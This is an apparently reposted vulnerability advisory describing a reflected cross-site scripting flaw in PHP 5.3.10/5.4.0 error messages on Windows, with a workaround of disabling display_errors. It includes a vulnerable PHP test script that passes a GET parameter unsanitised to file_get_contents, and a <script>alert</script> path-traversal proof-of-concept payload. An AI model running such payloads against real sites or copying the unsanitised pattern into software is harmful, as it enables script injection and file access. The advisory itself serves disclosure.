SecurityvulnsSECURITYVULNS:DOC:27915php(5.3.10-5.4.0)_XSS_vulns.txt
=============================================================================================
Vulnerable Software: PHP 5.3.10/5.4.0
php-5.3.10-Win32-VC9-x86.zip (MD5 SUM: af452dfa681ae03ff42eea6d1c7348cd )
php-5.4.0-Win32-VC9-x86.zip (MD5 SUM: b1b0abe883f84eb6d76793aabf1aa612 )
Downloaded From:windows.php.net
Tested:
OS:Windows NT SRV2003-A1W2LOM 5.2 build 3790 (Windows Server 2003 Enterprise Edition) i586
Apache from apachelounge.com: Version: 2.2.22.0
=============================INFO============================================================
PHP 5.3.10
OS:Windows NT SRV2003-A1W2LOM 5.2 build 3790 (Windows Server 2003 Enterprise Edition) i586
PHP Version 5.3.10
Build Date Feb 2 2012 20:26:31
Compiler MSVC9 (Visual C++ 2008)
Architecture x86
Configure Command cscript /nologo configure.js
"–enable-snapshot-build" "–disable-isapi" "–enable-debug-pack" "–disable-isapi" "–without-mssql"
"–without-pdo-mssql" "–without-pi3web" "–with-pdo-oci=C:\php-sdk\oracle\instantclient10\sdk,shared"
"–with-oci8=C:\php-sdk\oracle\instantclient10\sdk,shared" "–with-oci8-11g=C:\php-sdk\oracle\instantclient11\sdk,shared"
"–enable-object-out-dir=…/obj/" "–enable-com-dotnet" "–with-mcrypt=static" "–disable-static-analyze"
PHP 5.4.0
OS:Windows NT SRV2003-A1W2LOM 5.2 build 3790 (Windows Server 2003 Enterprise Edition) i586
Build Date Feb 29 2012 19:20:16
Compiler MSVC9 (Visual C++ 2008)
Architecture x86
Configure Command cscript /nologo configure.js "–enable-snapshot-build"
"–disable-isapi" "–enable-debug-pack" "–disable-nsapi" "–without-mssql"
"–without-pdo-mssql" "–without-pi3web" "–with-pdo-oci=C:\php-sdk\oracle\instantclient10\sdk,shared"
"–with-oci8=C:\php-sdk\oracle\instantclient10\sdk,shared" "–with-oci8-11g=C:\php-sdk\oracle\instantclient11\sdk,shared"
"–enable-object-out-dir=…/obj/" "–enable-com-dotnet" "–with-mcrypt=static" "–disable-static-analyze" "–with-pgo"
Vuln Desc: Cross Site Scripting Vulnerabilities.
Reason:Misconfiguration in php.ini-* file about:=> html_error <= directive
Also insufficent sanitization when generating warnings which is manipulatable by client side.
Problem in that PHP 5.3.10's php.ini "says":
//Snippet from php.ini-production (This also applies to php.ini-development except display_errors)
---------SNIP STUFF ------------------------
display_errors = off
----- SOME CONFIGURATION SNIP------------
; When PHP displays or logs an error, it has the capability of inserting html
; links to documentation related to that error. This directive controls whether
; those HTML links appear in error messages or not. For performance and security
; reasons, it's recommended you disable this on production servers.
; Note: This directive is hardcoded to Off for the CLI SAPI
; Default Value: On
; Development Value: On
; Production value: Off
; http://php.net/html-errors
html_errors = off
------------EOF SNIP STUFF------------------------
I Agree with: display_errors =off it works as expected but…
Simply enable it: display_errors = off to On state. (display_errors = On)
Restart Apache
And exploitate:
(lets say it is vulnerable script in server In eg:)
cat step2.php
/* BEGIN */
<?php
if(isset($_GET['test']))
{
file_get_contents($_GET['test']);
}
?>
/* = EOF */
From source code of page:(Take a look it doesn't "htmlentitied" by PHP.(Non Persistent Cross Site Scripting Vuln))
Warning: file_get_contents(): Unable to access …/…/…/…/…/…/…/…/…/…/…/…/…/…/<script>alert(document.location);</script> in C:\Program Files\Apache2.2\Apache2\htdocs\bypass\work\step2.php on line 6
Warning: file_get_contents(…/…/…/…/…/…/…/…/…/…/…/…/…/…/<script>alert(document.location);</script>): failed to open stream: No such file or directory in C:\Program Files\Apache2.2\Apache2\htdocs\bypass\work\step2.php on line 6
Print screen:
http://s019.radikal.ru/i634/1204/d8/ec8485e212bc.png
All problem in that: html_errors = off doesn't works as expected.(Am i Confused or ?)
(Note: In PHP Version 5.4.0 php.ini-production html_errors=On (<=In this state it is disabled) (This means it is off default.Because php 5.4.10 too is prone to this.
For testing Change it to Off.It is also vulnerable))
It "thinks" OFF state is ON and versa (OFF is ON)
You can confirm it simply:
change it to On state then restart Apache and try to exploitate like bottom.(It'll not work in this case.)
Here is after changing= > html_errors=On <= state: (Changed to On state)
From source code of page:(Take a look it is "htmlentitied" and safe now.)
<br />
<b>Warning</b>: file_get_contents(…/…/…/…/…/…/…/…/…/…/…/…/…/…/<script>alert(1);</script>) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: Invalid argument in <b>C:\Program Files\Apache2.2\Apache2\htdocs\bypass\work\step2.php</b> on line <b>6</b><br />
In fact on production servers => display_errors = off (default)<= so this suppress all this stuff.(This will mitigate this issuse.)
Here is my md5 summary's:
[email protected] /cygdrive/c/temp/mydirsnap
$ md5sum php-5.3.10-Win32-VC9-x86.zip
af452dfa681ae03ff42eea6d1c7348cd *php-5.3.10-Win32-VC9-x86.zip <= It is from my VirtualBox (same md5 summary)
[email protected] /cygdrive/c/temp/mydirsnap
$ md5sum 2/php-5.3.10-Win32-VC9-x86.zip
af452dfa681ae03ff42eea6d1c7348cd *2/php-5.3.10-Win32-VC9-x86.zip <= Just downloaded from windows.php.net (same md5 summary.See bottom)
[email protected] /cygdrive/c/temp/mydirsnap
$ ls -liaR
.:
total 15436
44754521297054585 drwxrwxrwt+ 1 Гость Отсутствует 0 Apr 8 22:57 .
3659174697249195 drwxrwxrwt+ 1 Domain Отсутствует 0 Apr 8 22:57 …
5629499534273522 drwxrwxrwt+ 1 Гость Отсутствует 0 Apr 8 23:01 2
3659174697298844 -rwxrwxrwx+ 1 Гость Отсутствует 15805513 Feb 13 00:37 php-5.3.10-Win32-VC9-x86.zip <= It is from my VirtualBox
./2:
total 15436
5629499534273522 drwxrwxrwt+ 1 Гость Отсутствует 0 Apr 8 23:01 .
44754521297054585 drwxrwxrwt+ 1 Гость Отсутствует 0 Apr 8 22:57 …
26177172834151436 -rwxrwxrwx+ 1 user Отсутствует 15805513 Apr 8 22:12 php-5.3.10-Win32-VC9-x86.zip <= Just downloaded from windows.php.net
[email protected] /cygdrive/c/temp/mydirsnap
Note: Not tested under Linux.Tested Only under Windows Server 2003 OS.
********************************************** Workaround*******************************************
After playing with html_error=on/off test your server like bottom)
Turn off all Display_erros in your php.ini (Suppress all errors,warnings and do not output
anything to client side)
/AkaStep ^_^
Greetz to all:
packetstormsecurity.*,securityfocus.com,cxsecurity.com,security.nnov.ru,securtiyvulns.com and to all others!
Thank you.